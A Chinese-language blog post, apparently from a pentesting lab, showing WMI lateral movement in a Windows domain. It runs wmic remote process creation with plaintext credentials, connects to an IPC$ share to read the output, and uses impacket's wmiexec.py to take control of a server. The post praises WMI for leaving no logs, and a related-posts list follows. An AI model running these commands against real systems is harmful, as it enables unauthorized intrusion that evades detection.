windows监控txt写入_WMI(windows管理模块)横向渗透

最新推荐文章于 2023-04-27 15:14:04 发布
最新推荐文章于 2023-04-27 15:14:04 发布
阅读量180 收藏
点赞数
文章标签: windows监控txt写入

45f1fa8860e3e4de752011257299ead5.png

自从PsExec被杀毒软件监控之后,黑客们又开始转移到WMI上,通过渗透测试发现,使用wmiexec进行横向移动时,windows操作系统竟然无动于衷,没有做任何日志记录。于是,越来越多的APT高级持续性威胁,开始了对WMI进行攻击研究~

1、使用WMI远程命令执行

  • win7域用户--> windows server 2012域用户(成功)
wmic /node:192.168.160.143 /user:HACKBIJIAdministrator /password:W2ngluoanquan process call create "cmd.exe /c ipconfig >c:ip.txt"

4b5194e153614808c3be2c7b1132f1be.png
  • 去windows server 2012域用户的C盘下,可以发现生成的 ip.txt 文件

07fd1925a3d28a69766678198ab05a58.png
  • 建立IPC$ (win7域用户--> windows server 2012域用户)
net use 192.168.160.143ipc$ "W2ngluoanquan" /user:HACKBIJIAdministrator

2c110822217ea0dd58f42fdd29c4ffb9.png
  • 获取ip.txt文件信息 (windows server 2012域用户)
type 192.168.160.143c$ip.txt

8bca94506083f6c264071b8a71609d2e.png

2、impacket工具包中的wmiexec

  • impacket的github官方地址
  • kali --> windows server 2012 (成功)
  • 获取远程windows系统的控制权
  • 不需要输入域信息
  • 进入impacket目录,先执行pip install . 安装依赖
  • 然后就可以轻松拿到远程windows server 2012系统的控制权了
python wmiexec.py Administrator:W2ngluoanquan@192.168.160.143

e6ed3b7b6129484e051253e620e1092b.png

本篇完~

weixin_39808953
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
认识win强大的管理工具——WMI(脚本篇)
06-27 1376
文章作者:勇敢的风 [E.S.T顾问团] feng.cnblog.com.cn信息来源:邪恶八进制安全小组 www.eviloctal.com好长时间没有写东西了,由于本人的文笔不怎么好,所以大家不要笑我。以下内容均为自己理解的,如有错误之处还请大家指出。我的技术面很窄,所以以下内容中的代码均为ASP+VBScript。正文:------------------------------------
Windows 内网渗透横向渗透
qq_53742230的博客
07-31 3086
内网渗透横向渗透
windows监控txt写入_如何在Windows诊断跟踪(diagtrack)服务中实现特权提升
weixin_39914752的博客
11-23 970
概述在本篇文章中,我们将研究Windows的“已连接的用户体验和遥测”功能,该功能也被称为“diagtrack”。本文将大量涉及与NTFS相关的术语,因此需要读者首先有一定的相关知识背景。在反馈中心中,有一个名为“高级诊断”的功能引起了我的关注。这个功能可以由所有用户触发,并且会导致C:\Windows\Temp中的文件活动,该目录可以由所有用户执行写入操作。要对这个功能进行逆向工程并复...
C、C++、MFC、Win32读取txt文本信息的代码
hushiwei1993的专栏
03-31 3215
1.C语言中文件操作。 2.C++语言中的文件操作。 3.Win32 API函数文件操作。 4.MFC CFile类文件操作。 5.MFC CFileDialog类的文件操作。 6.注册表文件操作。 下面我来详细说明一下各种文件操作方法: 1. C语言中文件操作.需要包含的头文件STDIO.H   写入文件: FILE *pfile=fopen("C.txt","w");/
渗透测试流程
zoubf的专栏
08-26 560
1.先配合dnslog平台,测试dnslog平台能否获取到服务器的访问记录,如果没有对应记录,也可能是服务器不出网造成的,利用时可以通过请求响应时间判断内网资产是否存在,然后再利用内网资产漏洞(比如redis以及常见可RCE的web框架)证明漏洞的有效性。通过域成员主机,定位出域控制器IP及域管理员账号,利用域成员主机作为跳板,扩大渗透范围,利用域管理员可以登陆域中任何成员主机的特性,定位出域管理员登陆过的主机IP,设法从域成员主机内存中dump出域管理员密码,进而拿下域控制器、渗透整个内网。...
Windows11渗透工具包分享
最新发布
MachineGunJoe666
04-27 2843
启动命令:python3 test.py* 已集成本镜像所有python3工具的依赖库* 使用pip3命令调用python3 pip* 启动命令:python test.py* 已集成本镜像所有python2工具的依赖库* 使用pip命令调用python2 pip* 已配置环境变量- Perl v5.36.0 (WIndows下使用频率不高,perl脚本用WSL运行)- Gcc v12.2.0 (由WSL安装内置)* Nginx v1.18.0 默认启动* PHP v7.4。
wmi.rar_C# WMI_windows wmi_wmi_wmi proerties
09-14
Windows Management Instrumentation(WMI)是Windows操作系统提供的一种管理和配置计算机环境的方法。它允许应用程序通过标准接口访问系统信息,如硬件状态、软件设置、网络配置等。C#作为.NET框架的一部分,提供了...
wmi.rar_Vbscript_windows巡检脚本_wmi VBScript_wmi v_防火墙
09-21
综上所述,这个压缩包提供的工具可以帮助IT管理员高效地监控Windows系统的健康状况,通过WMI和VBScript实现自动化巡检,并且考虑到防火墙配置以确保远程访问的安全。用户可以根据`checkserver.ini`配置脚本,然后...
WMI.rar_WMI 内存_win7 ManagementClass_wmi_wmi class windows
09-21
Windows操作系统中,WMIWindows Management Instrumentation)是一个核心组件,它提供了对系统硬件、软件和服务等资源的管理和查询功能。WMI是基于WBEM(Web-Based Enterprise Management)标准的,允许管理员和...
WMI.rar_C# WMI_WMI WIN32_process.z_windows wmi_wmi
09-14
标题"WMI.rar_C# WMI_WMI WIN32_process.z_windows wmi_wmi"中,核心关键词是"C# WMI",表明这是一个关于使用C#编程语言来操作Windows Management Instrumentation(WMI)的示例,其中可能涉及到WIN32_process接口。...
WMI.rar_delphi wmi_wmi_wmi delphi
09-20
标签"delphi_wmi wmi wmi_delphi"进一步强调了这个资源是关于在Delphi中使用WMI的,对于想要在Delphi应用程序中集成系统管理监控功能的开发者来说,这是一个宝贵的资源。 至于压缩包中的文件,"www.pudn.com.txt...
局域网渗透的一些小工具(支持win7)
10-31
一些内网的,命令行格式的工具,可以来看看,很简单
利用WMI打造完美三无后门(scrcons.exe)
穷途末路
10-16 9724
ASEC是WMI中的一个标准永久事件消费者。它的作用是当与其绑定的一个事件到达时,可以执行一段预先设定好的JS/VBS脚本
Windows 免费渗透测试套件,包含140多款工具
dzqxwzoe的博客
02-28 715
没学过的同学也不要慌,可以去B站搜索相关视频,你搜关键词网络安全工程师会出现很多相关的视频教程,我粗略的看了一下,排名第一的视频就讲的很详细。虚拟机环境配置成功后,以下所有的步骤均在该环境中操作。从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。不过我们这个水平也就算个渗透测试工程师,也就只能做个基础的安全服务,而这个领域还有很多业务,像攻防演练、等保测评、风险评估等,我们的能力根本不够看。
内网渗透windows
qq_63980959的博客
04-05 2570
Impacket是用于处理网络协议的Python类的集合。Impacket专注于提供对数据包的简单编程访问,以及协议实现本身的某些协议(例如SMB1-3和MSRPC)。数据包可以从头开始构建,也可以从原始数据中解析,而面向对象的API使处理协议的深层次结构变得简单。该库提供了一组工具,作为在此库找到可以执行的操作的示例。
内网渗透横向移动wmi&smb&密码喷射CrackMapExec
m0_62207170的博客
04-22 1739
内网渗透横向移动wmi&smb&密码喷射CrackMapExec
渗透测试笔记】之【内网渗透——横向移动:WMI的使用】
AA8j的博客
11-18 4308
文章目录1. 自带WMIC2. Invoke-WmiCommand.ps13. Invoke-WMIMethod.ps14. wmiexec.vbs5. wmiexec.py 1. 自带WMIC 特点: 不会产生日志记录 没有回显,若要查看命令结果需要配合IPC$与type命令 wmic /node:10.1.1.2 /user:administrator /password:1234567.com process call create "cmd.exe /c ipconfig >c:\ip.t
渗透神器----Windows10 渗透工具包
热门推荐
tlovejr的博客
04-20 1万+
前言 这几天一直有工作,所以就没有来的及去更新靶场还有CTF试题,接下来给大家更新一个优秀的工具:2022年最新Windows10 渗透工具包镜像 系统简介 基于Win10 Workstation 21H2 x64 MSDN原版镜像制作; 完整安装WSL Kali Linux 2022.1,并配置图形化模式; 精简系统自带软件,美化字体及部分图标,适度优化; 镜像容量74.5G,使用单磁盘文件存储,提升性能; 建议运行环境: vmware:16.0 运行内存:8G 固态硬盘:100G 免责声明
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值